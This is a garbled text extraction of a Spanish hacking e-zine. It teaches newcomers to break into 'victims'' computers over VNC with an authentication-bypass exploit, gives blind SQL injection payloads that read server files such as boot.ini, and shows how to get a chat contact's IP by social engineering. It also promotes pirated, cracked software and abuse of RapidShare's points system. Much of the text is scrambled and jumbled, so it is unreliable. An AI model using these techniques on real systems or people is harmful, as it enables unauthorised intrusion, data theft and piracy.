Download - CUH E-zine 3ª Edicion
-
8/14/2019 CUH E-zine 3 Edicion
1/69
-
8/14/2019 CUH E-zine 3 Edicion
2/69
Joejdf!
1 PORTA DA & A PENDICE3 EXPLOTA NDO PUERTOS6 CA MBIAR IP CON HIDEIP8 RA PIDSHA RE PREMIUM10 INYECCION A CIEGA S13 UTILIDA DES MSN17 CREA R Y ENCRIPTAR TROYA NO S21 CONOCIMIENTO BA SICO EXPLOITS23 INFECTA R FICHEROS EJECUTA BLES26 A PERTURA DE CARPETAS28 INTRODU CCION A L A SM II33 MA NUA L DE BA TCH
38 PROGRA MA CION C II4 2 TRIA NGULO DE PA SCAL4 4 PROGRA MA R EN A SP4 6 TABLA DE CODIGOS CARACTERES50 PENDRIV E USB DE A RRANQUE EN LINU X53 TUTORIA L BOTONES59 TUTO FIRMA60 SETUP BIOS CMOS62 INSTALA CION DE A STERISK66 MODDING GA LLERY 3!
-
8/14/2019 CUH E-zine 3 Edicion
3/69
Hacking Newbie
Explotando Puertos CUH e-zine 3 Edicion
Explotando Puertos By [p3ll3]
Explotando Puertos 5900 y 3899
Antes de empezar el tutorial tenemos queinformarnos un poco acerca de lo que vamos ahacer...En realidad este tutorial va a tratar de explicar comopodemos controlar un pc remotamente con la ayudade los administradores de las pc victimas. xD
Que es control remoto ???Bueno en este caso vamos a tener acceso a todas lasfunciones de la pc victima como si furamosadministradores.
Que es o que funcion cumplen los puertos que vamosa utilizar para poder tener control sobre ella ???Los puertos mencionados arriba son los que utiliza elprograma VNC para poder conectarse remotamente
Y el puerto 3899 es el utilizado po
a la pc (en realidad solo el 5900).
r windows para el
ara poder realizar la intrusin necesitamos lo
Un scanner de puertos. (propio o el que
El scanner de VNC (para windows solamente,
En linux solo necesitamos el Krfb que esta
Y sobre todo mucha paciencia.Como conocemos una victima ??
uy fcil yo creo que ya hasta ustedes lo saben;
map -P0 -p T:3899,5900
RDP que cumple la misma funcin del VNC.
Psiguiente:
recomendara es Nmap)
google: BoztecVNC scanner), eso si no sequieren complicar la vida.
pre-instalado, por lo menos en Slackware en la parte de los programas de Internet.
reMpara saber si una victima es o no vulnerablesimplemente aplicamos el siguiente comando, estoutilizando Nmap:
n
es lo que hace??ste comando fue escogido porque va a hacer un
para decirle al scanner que
ste comando nos va a devolver el siguiente
Porque este comando y queEescaneo sencillo a esa ip y a esos puertos.-P0 => hace el escaneo a fuerza.-p => especifico puertosT: => va junto a -p y esson puertos TCP.
Eresultado:
-
8/14/2019 CUH E-zine 3 Edicion
4/69
Hacking Newbie
Explotando Puertos CUH e-zine 3 Edicion
Como vemos en la imagen nuestra victima cuenta
mucha explicacin ahora como
ienes dos opciones para entrar a la pc, la fcil y la
con muchos puertos abiertos que pueden sertomados como vulnerabilidades pero lo que nosinteresa son las que ya he mencionado antes.
Bueno,bueno, yahago para entrar en el pc ???Ttodava mas fcil ,xD .
n linux podemos utilizar Krfb, la forma para entrar
Como entro entonces??Eseria entonces:
n este caso parece que esta protegido el VNC pero
loit:
para
Ayuda de Nmap
E
no se preocupen que eso se puede solucionar...Para poder loguearse remotamente esta el exprealvnc_41_bypass , con la ayuda de este exploitse van a loguear sin necesidad de passwords.-Con windows solamente utilizan el scannerVNC que mencione anteriormente y lograranloguearse (si tiene clave utilizan el mismo exploit),este scanner trae otras utilidades bastante buenas
que pueden hacer uso en caso de que no tenga esospuertos vulnerables.
Some Common Scan Ty oot privileges)pes (* options require r* -sS TCP SYN stealth port scan (default if privileged (root))-sT TCP connect() port scan (default for unprivileged users)* -sU UDP port scan-sP ping scan (Find any reachable machines)* -sF,-sX,-sN Stealth FIN, Xmas, or Null scan (experts only)-sV Version scan probes open ports determining service & appnames/versions-sR RPC scan (use with other scan types)Some Common Options (none are required, most can be
combined):* -O Use TCP/IP fingerprinting to guess remote operating system-p ports to scan. Example range: 1-1024,1080,6666,31337-F Only scans ports listed in nmap-services-v Verbose. Its use is recommended. Use twice for greater effect.-P0 Dont ping hosts (needed to scan www.microsoft.com andothers)* -Ddecoy_host1,decoy2[,> Hide scan using many decoys-6 scans via IPv6 rather than IPv4-T General timing policy-n/-R Never do DNS resolution/Always resolve [default: sometimesresolve>-oN/-oX/-oG Output normal/XML/grepable scan logs to
-iL Get targets from file; Use - for stdin* -S /-e Specify source address ornetwork interfaceinteractive Go into interactive mode (then press h for help)Example: nmap -v -sS -O www.my.com 192.168.0.0/16 192.88-90.*.*
ueno por ahora eso fue todo, espero que les haya
Saludos
Bservido el tutorial y que este les haya enseado o porlo menos los haya motivado a buscar formas decomo mejorar esto que acaban de leer.
[p3ll3]
-
8/14/2019 CUH E-zine 3 Edicion
5/69
Hacking Newbie
Cambiar IP CUH e-zine 3 Edicion
Cambiar IP con HideIP By ChUtOReCaRgAdOPrimeramente me presentare, Hola,
para los que no me conocen soyJos pero ms conocido comoChUtOReCaRgAdO y espero que teguste este pequeo aporte que he
hecho. Aprende cambiar tus IP y crear un reseteador
de estas (siendo dinmicas o Esttica)
En este manual Tratare de ensear a usar el Hide IPPlatinum, para que lo puedan usar bien yconfigurarlo de tal manera que les pueda servir dealgo, para los que no saben este soft te cambia tu IP
o la oculta.Tambin a crear una reseteador IP dinmicas paraque no tengas hacer nada ms que apretar un .batpara que tu Ip cambie (solo para IPs dinmicas),
Conceptos que debemos saber:IP: (Internet Protocol) es un conjunto de cuatronmeros cada uno de ellos va desde el 0 al 255,separados por puntos, con los cuales se identifica aun ordenador conectado a una red que corre bajoeste protocolo.
Nuestra IP puede ser:
IP Esttica (si siempre es la misma) ElIP Platinum esespecialmente para aquellos que no tienen IPDinmica (por que cambiar la IP siendo esta es muyfcil) o simplemente si quieres ser annimonavegando por la web.
IP dinmica (si cuando reiniciamos la conexincambia). O sea si apagamos el modem odesconectamos el cable Ethernet y luego loconectamos, nuestra IP Tericamente cambia.
1. Empezare por ensear a cambiar tu IP(especial para IP) esttica:Para esto Ocuparemos Hide IP Platinum
Bueno para los que no saben el Hide IP-Platinum espara cambiar la IP. De modo que te asigna una IPdiferente, esto es muy til ya que puedes navegarlibremente por la red siendo annimo y lo masbueno de este soft sirve para evadir la espera enrapishare.com ya que al cambiarte la IP la base dedatos de esta Web (rapidshrare.com) no te reconoce,
y te dar acceso directo a la descarga del archivoque quieres ahorrndote la largusima espera deeste.
Requerimientos del Sistema:
Windows 98/2000/XP/2003/Me 64 Megabyte Memoria 300 MHz CPU
Lo primero que tenemos que hacer es descargar elsoft que lo puedes hacer de aquhttp://rapidshare.com/files/84262778/Hide_IP_Platinum_v.3.5___Serial.exe
Pass: chue-zineO lo puedes buscar en el Google escribiendo estafrase (que siempre funciona) Hide IP Platinum+Crack y lo descargas, una vez que esta lista ladescarga lo descomprimes en una carpeta(seguramente tendr dos archivos, el Programa yuno de texto que es el cdigo de activacin) una vezque ya tengas listo ejecutas el archivo .exe
Le das en siguiente, aceptar, siguiente, siguiente,siguiente, Install, finish.
Si todo sali bien, ya estar el soft listo para serusado, una vez que ejecutes el Soft te saldr estaventana
Tienes que darle en esta opcin, e ingresas el cdigoque est en archivo anteriormente nombrado (el detexto que viene con el programa, ese que est en la
carpeta) una vez insertado el cdigo apretas en Oky listo,Aparecer un Icono en la barra de tareas
http://rapidshare.com/files/84262778/Hide_IP_Platinum_v.3.5___Serial.exehttp://rapidshare.com/files/84262778/Hide_IP_Platinum_v.3.5___Serial.exehttp://rapidshare.com/files/84262778/Hide_IP_Platinum_v.3.5___Serial.exehttp://rapidshare.com/files/84262778/Hide_IP_Platinum_v.3.5___Serial.exe -
8/14/2019 CUH E-zine 3 Edicion
6/69
Hacking Newbie
Cambiar IP CUH e-zine 3 Edicion
Esto significa que el programa se est poniendo alda (actualizando) en este momento no debes hacer
nada con l.Una vez que se ha actualiza en soft buscara en elproxy, una IP y te la dir
Si te sale esto es que todo resulto bien, tu IP ha sidocambiada
Si sale este Icono es que el IP-platiniun no ha
encontrado ningn servidor y lo mejor es cambiar elproxy, mas adelante te enseare a cambiarlo.
Pero primero cmbiale el Lenguaje haciendo dobleclick en el icono de la barra de tareas te vas aidioma le pones espaol y dejas tal cual lasfunciones que trae.
Ahora explicare algunas de las funciones msimportantes que trae este soft:
Esta opcin sale al hacer click con el botnizquierdo del mouse sobre el Icono de la barra detareas de dicho soft.
Stop Hide IP/Hide IP: Es para detener el Hidetemporalmente, tambin lo puedes hacer con lasteclas Ctrl+W.Change Proxy: sirve para cambiar el Proxy o sea laIP. Tambin se puede hacer Ctrl + Q.My IP: abre una pg. web , en esta te muestra tu IPactual .Ctrl+DExit: Cierra el programa.Algunas Recomendaciones:Si se demora demasiado en encontrar una IP puedes
cambiar el Proxy ej. A http://rapidshare.comY en la cadena de caracteres tienes que poner unapalabra como ej.Rapidshare.
Pero si quieres puedes poner el que te apetezca.Pero cuidado si no sabes que poner, mejor deja todocomo esta porque si est mal el proxy el software nofuncionar.
Si quieres bajar un archivo de http://rapishare.com yal cambiar la IP no puedes descargar el archivotienes que presionar Ctrl+Q y buscara otra IP
Y vas probando si te funciona enhttp://rapishare.com, hasta que encuentres una quepuedas descargar al tiro pero tambin tienes que iractualizando la pg. (F5).
Ahora les enseare a crear un reseteador de IPdinmicas:Cuando tenemos IP dinmica, significa que cada vezque conectamos la internet, nos entrega una IPnueva, pero para hacer esto, hay que reiniciar elEquipo o sacar el cable que conecta la Internet, oapagar el Modem, que es un jaleo enorme,
Si lo que quieres es apretar un botn y que sereinicie la conexin a Internet y te cambie la IP sigueleyendo, ya que enseare a hacer un soft (es muysimple) pero que es muy til , tenemos que abrir unahoja del block de notas o cualquier editor de texto
plano y escribimos lo siguiente:
@echo offIpconfig/flushdnsIpconfig/releaseIpconfig/renewIpconfig /release *Con*ExitLo guardamos en el escritorio, y le ponemos elnombre que nosotros queramos pero con extensin.bat, listo ya est hecho el reseteador de IPdinmicas. Fcil No?
Saludos, hasta la prxima.
http://rapidshare.com/http://rapishare.com/http://rapishare.com/http://rapishare.com/http://rapishare.com/http://rapidshare.com/ -
8/14/2019 CUH E-zine 3 Edicion
7/69
Hacking Newbie
Cuenta Premium En RapidShare CUH e-zine 3 Edicion
Crear una cuenta Premium En RapidShare By ChUtOReCaRgAdO
COMO CREAR UNA CUENTAPREMIUM O EXTENDER UNA SI YA LATIENES EN RAPIDSHARE.COMPerdn por que no lo haba dado aconocer directamente al foro ya que
quera algo bueno en mi primerartculo en la Cuh e-Zine (pero luego lo subo alforo).
ES VERDAD!, como dice el titulo en las prximaslneas te enseare como crear una cuenta (sin gastarningn dinero) en este servidor de gestin dedescarga y como todos saben es uno de los mejoresy yo dira el mejor ya que es muy rpido (es porquetiene un acelerador de descarga muy bueno) y quelas mejores cosas estn alli, como los SOs No libres,software de calidad (muchos), Msica, pelculas yetc. y etc.Pero lo malo de esto es cuando No tienes una cuentaPremium ya que tienes que esperarte varias horaspara volver a bajarte un archivo (si es que bajaste
algo de 100 Mb, adems es lo mximo que puedesdescargar con cuenta free, por que cuando uno bajaFree solo puede descargar algo igual o menor a 100Mb) pero si tienes una cuenta Premium bajas todoquieras, tener varias descargas simultneas, noesperar, sin virus, etc.Pero tambin lo puedes utilizar para compartirarchivos pesados con amigos, familiares, no es paraque siempre rompamos las reglas de copy-restrinjido.Aunque hay varis programas que tratan de evadircambiando la IP (que es el mtodo ms que se usa)
lo mejor es tener una Cuenta Premium.Ya basta de palabrera y vamos al grano. Parapoder hacer nuestra cuenta necesitamos estesoftware Easy Rapidshare Points 3.0.
Este con este software haremos lo siguiente (yo hastaesta parte iba muy emocionado por qu meimaginaba otra cosa pero sigue y el premio esgrande) Miren lo que hace el Easy RapidsharePoints 3.0 es ayudarte a hacer puntos, si bien sabest puedes ir subiendo cosas a esta web(Rapidshare.com) y llevar un registro de cuantas
veces se ha descargado (pero tienes que tenercuenta Free o Premium) y te van dando un punto porcada vez que descarguen un archivo que t hassubido (pero con la cuenta Premium o free). Y para
que nos hagamos una Premium (de un AO) o
extender la que ya tenis, hay que acumular 8000Puntos (hartos verdad) pero con todos estos puntoste dan un ao de cuenta Premium.Lo primero que debemos hacer es bajarte este softdehttp://rapidshare.com/files/84259641/Easy_Rapidshare_Points_3.exePass:chue-zineO tal vez cuando leas esto el link este roto o tal vezla versin vaya en otra ms que la 3.0, bueno no teaflijas, te vas al Google y pones la frase mgica quea m siempre me funciona Easy Rapidshare Points
(versin que buscas)+ crack .Una vez que lo descargas lo desempaquetas sibajaste mi archivo claro, ya que lo hice un .exe paraque no necesites software adicionales paradescomprimirlo un ejemplo es WinRar (debera estarel soft y un archivo de texto) si ests listo parainstalarlo ejecutas el .exe, si sabes Ingles Lees , perosi no, No leas, pero dice algo sobre que cierres losprogramas que tienes y ejecucin y bla, bla, lomismo que dicen todos y que nunca hago caso, heigual funcionan, apretar Next (siguiente).En esta parte Tienes que llenarlo con algunos datos y
donde dice serial tienes que poner uno de los tantosque hay en el archivo de texto que vienes con elpaquete que descargaste (recuerdas?).Siguiente, eliges donde quieres Instalarlo, siguiente,siguiente.Listo el programa est instalado, una vez instaladono lo ocuparemos al tiro.Ahora tenemos que hacer un archivo que pese msDe 1 mega y menos de 2 Mb, lo comprimimos(recomendado), si ya tienes una cuenta Premiumseguramente sabes subir archivos, entonces lo subes,pero si no tienes una Cuenta Premium debes hacerte
una Free (libre), si no sabes hacerte una sigueleyendo pero si sabes sltate estas estrofas.
Hacerse una cuenta Free en Rapidshare:Abres una pg. web (con el Mozilla Firefox, InternetExplorer, Opera, tu elije el que ms te acomode)Nos vamos a: http://rapidshare.com subes el archivoque hemos creado anteriormente, para hacer esto dedebes marcar donde dice examine, buscas el archivoque hemos hecho antes y aceptar, luego seleccionaunload, esperas que se suba el archivo (el tiempo de
espera vara segn la velocidad de conexin quetengas) .Una vez que se termine de subir te saldrn los datos;cual es el link, si quieres enviarle el link a amigos,
http://rapidshare.com/http://rapidshare.com/http://rapidshare.com/files/84259641/Easy_Rapidshare_Points_3.exehttp://rapidshare.com/files/84259641/Easy_Rapidshare_Points_3.exehttp://rapidshare.com/http://rapidshare.com/http://rapidshare.com/files/84259641/Easy_Rapidshare_Points_3.exehttp://rapidshare.com/files/84259641/Easy_Rapidshare_Points_3.exehttp://rapidshare.com/ -
8/14/2019 CUH E-zine 3 Edicion
8/69
Hacking Newbie
Cuenta Premium En RapidShare CUH e-zine 3 Edicionpero para que nos gamos una cuenta Free tienesque irte al final de la pg. y rellenar con tus datosdonde dice user name (pones un nombre deusuario para registrarte ej. ChUtOReCaRgAdO,Email tienes que poner tu email verdadero y enpassword una contrasea y aceptas.Si esta todo correcto y te sale una pg. Como la dea continuacin, ya tienes tu cuenta Free, pero si no,es que algo quedo mal, vuelve a escribir tu nombrede usuario o contrasea.
Escribimos los datos que hemos puestoanteriormente, tu nombre de usuario y contrasea yapretar Enter o donde dice SSL-encrypted Login , siest bien ya estarn dentro de tu cuenta free la pg.que muestra es diferente a la antes ya que ahorasale lo mismo para subir archivos pero abajo saleuna lista de los archivos que has subido con lacuenta, ahora tienes que copiar el link del archivoque subimos anteriormente, tienes que llevar elcursor donde aparece un icono de archivo de texto y
luego presionas el botn izquierdo del mouse ycopias el link (copiar destino), ahora tenemos queabrir el Rapidshare Points, Inicio, todos losprogramas, Easy Rapidshare Points 3.0, y lo abres,copias el link en la barra de direcciones y aprestaGo, entraremos a Rapidshare, tienes que bajarte elarchivo, te vas al final de la pg. marcas donde diceFree, luego te vas al medio de la pg. y esperas unminuto, pones Las letras que aparecen y lodescargas, pero la gracia esta que cuando valla enla mitad o un poco mas all cancelas la descarga,luego repites el proceso una y otra vez.
Es recomendable hacerlo entre hartas personas yaque se avanza mucho ms rpido.
En 1 Minuto 1 punto30 Minutos 30 puntos1 Hora 60 puntos1 da 1440 puntos1 Mes 43.200
PD: yo hace un mes que lo estoy intentando hacermeuna, pero para m es muy difcil ya que no tengointernet y tengo que ir a un ciber.Para ver los puntos que llevas tienes que ingresar atu cuenta a Rapidshare para ver cuntas veces se habajado el archivo.Te metes a la Web y te vas a la seccin Free Zone, yte metes en el sub-men Collector`s zone login, metestu nombre de usuario y contrasea y listo.Tambin aconsejo otro soft que les puede servir yaque puede hacer varias descargas simultneas, el
Downlop Direct, tienes que instalarlo y aplicarle elcrack, luego lo abres :
Y para empezar a descargar presiones donde dice ycopias el link pero este a veces lo identifica solo, ycomienza a descargar, luego haces lo mismo hastaque ya no se puede poner ninguna descarga, ycuando vallan en la mitad, lo cancelas o remuevesuno o todos, y as vas avanzando harto, pero elarchivo tiene que estar en .Zip o .rar, y este softconsume muchos recursos, si queremos encontrar elprograma que menciono nos vamos al Google y
ponemos Download Direct+crackSaLuDos y hasta la prximaBy ChUtOReCaRgAdO
mailto:[email protected]:[email protected] -
8/14/2019 CUH E-zine 3 Edicion
9/69
Hacking Newbie
Inyeccion a ciegas SQL CUH e-zine 3 Edicion
INYECCION A CIEGAS DE SQLI PARTE By Alesteir
INYECCION A CIEGAS DE SQL -BLIND SQL INJECTIONPara nadie es un secreto que unasde las mayores vulnerabilidades de
la red son las famosas inyeccionesSQL, pero existen variadas tcnicas y una de ellas, esla que actualmente se conoce como inyeccin aciegas de SQL (blind sql injection), este articulo esuna corta introduccin y nos ayudara a comprenderlo que son y como funcionan dichas tcnicas yalguna cosilla mas, en el siguiente numero del e-zinetrataremos la forma de explotar dichas
vulnerabilidades.
Inyeccin SQL
Una inyeccin de cdigo SQL esta basada en unainteraccin de un intruso con el motor de una basede datos, en la cual el atacante puede obtener yhasta modificar los datos, e incluso el atacantepuede llegar a obtener y manipular archivos, con laconsecuencia de poder manejar los datos y elsistema a su antojo y con total libertad. Todo ello sedebe a la mala validacin y filtrado de los datosintroducidos por el usuario (Cliente), por parte de la
aplicacin Web (Servidor) que maneja el gestor de labase de datos, de forma que el intruso puedealterar las sentencias SQL aceptadas por laaplicacin server.
Injeccion Ciega de SQLEsta tcnica se usa cuando una web no muestra lostpicos mensajes de error de la base de datos, al nohaber un resultado positivo en una consultaespecifica, o sea que solo se enviar una respuestapor parte del servidor si el resultado es correcto. Es
por ello que sentencias que contengan entre suscondiciones valores comparativos como 1=1 o0=1 ofrecen respuestas, bien sea respuestasnegativas o positivas, esta es la base de esta tcnica
de inyeccin SQL. Ahora Supongamos que tenemos
una aplicacin web, la cual usa los datos que recibepor parte del usuario (Cliente) para construirsentencias de consulta y de esta forma mostrar lainformacin pertinente (solicitando los datos alServidor), ahora resulta que llegado el punto,sabemos de su vulnerabilidad y procedemos ainyectar consultas pero no vemos los datosobtenidos, no obstante, podemos distinguircomportamientos distintos entre consultas quemuestran datos, y las que no lo hacen, es all dondebasados en valores verdadero (true) o falso (false)que son devueltos por la aplicacin, que debemos
saber el tipo de inyeccin ciega pertinente, para deesta manera obtener los datos que deseamos poseer.Para saber si un parmetro es vulnerable a unainyeccin ciega de sql supongamos que tenemos unaweb, y la pagina 467, por decir algo un ejemplo:
http://www.ejemplo.org/pagina.php?id=467
Entonces aadimos abs() de la siguiente manera:
http://www.ejemplo.org/pagina.asp?idpagina=abs(467)
Y si la pgina se muestra correctamente sabremosque la web es vulnerable a un ataque a ciegas deinyeccin SQL.
-
8/14/2019 CUH E-zine 3 Edicion
10/69
Hacking Newbie
Inyeccion a ciegas SQL CUH e-zine 3 Edicion
Inyeccion a ciegas basado en tiempos de respuestaLas primeras referencias en cuanto al tema las hizoChrish Anley en el documento: Advanced SQLInjection en el 2002 hacia referencia de laposibilidad de realizar ataques a ciegas basado entiempos de respuesta , en dicho documento el
explicaba cdigos, mtodos y practicas para hacerconsultas sin importar si obtenamos resultadospalpables, e indefectiblemente saber si eran ciertaso no, todo ello dependiendo, de el tiempo en que elmotor de la base de datos tardaba en dar larespectiva respuesta a la consulta. A partir de all seempez a indagar por parte de otras mentesinquietas, pronto se descubrieron parmetrosvulnerables a inyeccin SQL, de forma que sinnecesidad de ver los resultados de la consulta, sepodan conseguir resultados a partir del tiempo derespuesta dado por el gestor (y con un poco de
lgica se podan transforman en datos reales), otrosmas osados crearon herramientas para explotar(exploits) dichos parmetros vulnerables ainyecciones ciegas y hasta que con el tiempo sevolvi ya todo un tpico, a la hora de penetrar unsistema basado en consultas a un gestor de base dedatos. La tcnica consiste en generar retardos en lasinyecciones, y la mejor forma de usar estavulnerabilidad, es conociendo las funcionesespecificas cada motor de base de datos, benchmark(sleep en la versin 5 y posteriores) en mysqlm,waitfor en SQL server, DBMS_Lock.Sleep() enOracle; por nombrar solo algunas.
Veamos pues la forma de inyectar cdigo a ciegasen distintos gestores:
Mysql_http://server/ejemplo.php?id=35 and exists(select *from Passwords andbenchmark(8000000,md5(rand()))=0
Mysql (versiones 5):http://server/ejemplo.asp?id=35 and exists(select *from Passwords) and sleep(8)
Oracle:http://server/ejemplo.php?id=1; begin if (exists(select* from Passwords)) then dbms_lock.sleep(8); end if;end;
Microsoft SQL Server :http://server/ejemplo.php?id=35; if (exists(select *from Passwords)) waitfor delay 0:0:8
En la anterior consulta el motor evala si la tablaPasswords existe y si contiene registros, al cumplirsela condicin la respuesta se retardar por un lapsode 8 segundos, es bueno recalcar que no todos losgestores permiten la tcnica de inyeccin a ciegascon retardo de tiempo
Inyeccin a ciegas basado en tiempos de respuestausando consultas pesadasExiste otra tcnica que se basa en usar consultaspesadas, las cuales al exigir al motor de bases dedatos y de manera obvia generar un retardo detiempo ante respuestas positivas. Supongamos quesabemos cual es el parmetro vulnerable de unaconsulta y queremos saber si existe una tabla X enespecial, aqu optaramos por elaborar una consultaque solo haga trabajar al motor un tiempo extra connuestra consulta pesada si dicha sentencia cumple lacondicin de que la tabla X exista en la base de
datos, de otra forma no lo hara y por lgica eltiempo de respuesta seria distinto, es aqu donde sedeben conocer las clausulas y el tipo de condicionesque se pueden llegar a manejar, (tal como sucedecon la clausula Where), para as mismo poderelaborar adecuadamente nuestro consulta , para ellose hace necesario conocer la evaluacin de lascondiciones por parte de los gestores, en el caso dela clausula Where , si la clusula tiene encadenadasus condiciones por operadores de tipo OR laconsulta se evaluar, mientras ninguna condicindevuelva un resultado verdadero, contrariamente
cuando estn encadenadas por operadores de tipoAND las condiciones se evaluarn mientras ningunadevuelva un valor falso, basado en este mecanismoes que se optimiza el tiempo de respuesta para lascondiciones, es por ello que los motores tienen unorden a la hora de hacer la evaluacin, pero es elprogramador quien realmente define el orden de lascondiciones en una clausula Where, veamos porejemplo la siguiente consulta:
Select nombre from Passwords where nombre=Aleksand pass=qwerty;Select pass from Passwords where nombre=Aleks orpass=qwerty;
En el primer caso usamos una condicin AND, si alevaluar la primera condicin obtenemos un valor
-
8/14/2019 CUH E-zine 3 Edicion
11/69
Hacking Newbie
Inyeccion a ciegas SQL CUH e-zine 3 EdicionFALSO el gestor no evaluar la otra, en la segundaconsulta con el operador OR si la primera condicines VERDADERO no se evala la siguiente condicin.Sucede que no siempre es el gestor el que realiza laoptimizacin, es entonces donde el programadordebe saber la precedencia y el mismo efectuar laoptimizacin, pudiendo ser de izquierda a derecha oviceversa.
Actualmente los motores modernos estiman el tiempode cada condicin y evalan primero la condicionalde menos valor en tiempo real de ejecucin, estaparticularidad es la que nos permite aprovecharnosde este tipo de situacin.
Imaginemos que tenemos el parmetro vulnerableid_usuario en alguna URL:
http://www.ejemplo.org/pagina.asp?id_Usuario=1Con lo dicho anteriormente, si quisiramos saber siuna tabla existe realizamos ms o menos la siguienteconsulta:http://www.ejemplo.org/pagina.asp?id_Usuario=1[nuestra consulta pesada]andexists (select * fromPasswords)De lo anterior deducimos que si la tabla clavesexiste , nuestra consulta pesada se efectuaragenerando un retraso de tiempo considerable, locual nos revelar que efectivamente la tablaPasswords existe y que adems posee mas de unregistro. La eleccin de nuestra consulta pesada serla clave a la hora de saber el retardo y por endesaber si nuestra consulta ha sido efectiva. Entoncescomo elegimos nuestra consulta pesada? Larespuesta se da conociendo las tablas internas paracada gestor de base de datos, por ejemplo en SQLServer tendramos sysobjects y en Accesstendramos MSysObjects; o tablas propias de laweb vulnerable, que por obvias razones nosotrosseriamos quienes deduciramos aquellas tablas quecontienen registros, de esta forma podemos medirlos tiempos entre una consulta que cumpla lascondiciones y una que no. Podemos generarconsultas pesadas es unir tablas con otra s y otrashasta generar una cantidad grande de registros deforma que tan que obliguen al servidor a consumirun tiempo medible en procesarlo. Para ello bastacon conocer o averiguar o adivinar una tabla delsistema de bases de datos, que tenga algn registro,y unirla consigo misma hasta generar un tiempomedible. Vamos a ver algunos ejemplos.Segn lo dicho anteriormente podemos hacer lasiguiente consulta en la cual se invierte la condicin yas poder comparar los tiempos entre cada una deellas:
http://www.ejemplo.org/pagina.asp?id_Usuario=1[nuestra consulta pesada]and not exists (select *from claves)
Otras tcnicas de Blind SQL InjectionDe esta forma ya sabemos que podemos consultar aciegas cada uno de los elementos del motor de una
base de datos vulnerable, es lgico quedependiendo todo ello de los tipos de privilegios dela cuenta con que accedamos al servidor. Tambinexisten otro tipo de tcnicas que nos permitenhacernos con archivos directamente del sistemaoperativo del servidor, con esto ya tenemos casi queun acceso total a la web. Existen distintas funcionesen cada gestor por ejemplo en Microsoft SQL Server
2005 tenemos las funciones OpenRowset y BULK quese manejan combinadas, he aqu dos ejemplos :
http://www.ejemplo.org/pagina.php?id=1 and (selectdatalength(Z) from OpenRowset(BULK 'c:\Boot.ini',SINGLE_CLOB) as t(Z)) >1
http://www.ejemplo.org/pagina.php?id=1 and(select substring(Z,{PosByte},1) fromOpenRowset(BULK 'c:\ Boot.ini', SINGLE_CLOB) ast(Z)) > 5
Es asi como podramos automatizar el proceso yobtener todo el contenido del archivo con un cdigoque llame uno a uno los caracteres del archivo quevamos a conseguir.
En MySQL podemos usar la funcin LOAD_FILE, lacual acepta como parmetro la ruta de el archivopero en hexadecimal. Ahora si queremos realizar unataque a el archivo c:Boot.inidebemos primero que todo convertirlo ahexadecimal: 0x633A5C626F6F742E696E69 con estopodemos proceder con la inyeccin:
http://www.ejemplo.org/pagina.php?id=1 andmid(Load_File(0x633A5C626F6F742E696E69),1,1)=CHAR(34)
La condicin ser positiva, si la primera letra delarchivo corresponde con el carcter ASCII 34., es asique por medio de automatizacin y de fuerza brutapodramos obtener todos los datos de un archivo,alginas herramientas se basan en este mtodoPara saber si una web es vulnerable a una inyeccinciega de sql supongamos que tenemos una web, pordecir algo un ejemplo:http://www.ejemplo.org/pagina.php?id=467Entonces aadimos abs() de la siguiente manera:
http://www.ejemplo.org/pagina.asp?idpagina=abs(467)
Si la pgina se muestra correctamente sabremos quela web es vulnerable.
Para la prxima edicion queda la otra parte de estearticulo, espero que les guste!
Suertes!!! By Alesteir
-
8/14/2019 CUH E-zine 3 Edicion
12/69
Hacking Newbie
Utilidades MSN CUH e-zine 3 Edicion
UTILIDADES MSN >By Ra19ejecutar>cmd se nos abreuna ventana as:
Despus a travs de ing. social,
(deje link abajo para que
aprendan lo que es por si acaso)
le enviaremos algo:
(Est en francs m SO pero eso no tieneimportancia)Cuando el/ella acepte en el momento de la
transferencia abrimos el MS/DOS (lo dicho masarriba) y escribimos netstat n, el cual nos dartodas las conexiones establecidas que tiene el PC.(Se recomienda tener todo cerrado menos la ventanade la persona para tener menos conexiones y podersaber cual es)Generalmente hay mas de una IP hay que irprobando.
Mtodo 2
P Para esto se necesitan diferentes recursos en la PC.
- Windows Live MSN- El PLUS de el Windows live MSN.- IP GET
http://209.85.135.104/search?q=cache:v6BJxMJ13XwJ:foro.el-hacker.com/index.php/topic,112902.0.html+definicion+de+ip+site:foro.el-hacker.com&hl=es&ct=clnk&cd=1&gl=mxhttp://209.85.135.104/search?q=cache:v6BJxMJ13XwJ:foro.el-hacker.com/index.php/topic,112902.0.html+definicion+de+ip+site:foro.el-hacker.com&hl=es&ct=clnk&cd=1&gl=mxhttp://209.85.135.104/search?q=cache:v6BJxMJ13XwJ:foro.el-hacker.com/index.php/topic,112902.0.html+definicion+de+ip+site:foro.el-hacker.com&hl=es&ct=clnk&cd=1&gl=mxhttp://209.85.135.104/search?q=cache:v6BJxMJ13XwJ:foro.el-hacker.com/index.php/topic,112902.0.html+definicion+de+ip+site:foro.el-hacker.com&hl=es&ct=clnk&cd=1&gl=mxhttp://209.85.135.104/search?q=cache:v6BJxMJ13XwJ:foro.el-hacker.com/index.php/topic,112902.0.html+definicion+de+ip+site:foro.el-hacker.com&hl=es&ct=clnk&cd=1&gl=mxhttp://foro.el-hacker.com/index.php/topic,43462.0.html#bothttp://foro.el-hacker.com/index.php/topic,43462.0.html#bothttp://foro.el-hacker.com/index.php/topic,43462.0.html#bothttp://foro.el-hacker.com/index.php/topic,43462.0.html#bothttp://209.85.135.104/search?q=cache:v6BJxMJ13XwJ:foro.el-hacker.com/index.php/topic,112902.0.html+definicion+de+ip+site:foro.el-hacker.com&hl=es&ct=clnk&cd=1&gl=mxhttp://209.85.135.104/search?q=cache:v6BJxMJ13XwJ:foro.el-hacker.com/index.php/topic,112902.0.html+definicion+de+ip+site:foro.el-hacker.com&hl=es&ct=clnk&cd=1&gl=mxhttp://209.85.135.104/search?q=cache:v6BJxMJ13XwJ:foro.el-hacker.com/index.php/topic,112902.0.html+definicion+de+ip+site:foro.el-hacker.com&hl=es&ct=clnk&cd=1&gl=mxhttp://209.85.135.104/search?q=cache:v6BJxMJ13XwJ:foro.el-hacker.com/index.php/topic,112902.0.html+definicion+de+ip+site:foro.el-hacker.com&hl=es&ct=clnk&cd=1&gl=mxhttp://209.85.135.104/search?q=cache:v6BJxMJ13XwJ:foro.el-hacker.com/index.php/topic,112902.0.html+definicion+de+ip+site:foro.el-hacker.com&hl=es&ct=clnk&cd=1&gl=mx -
8/14/2019 CUH E-zine 3 Edicion
13/69
Hacking Newbie
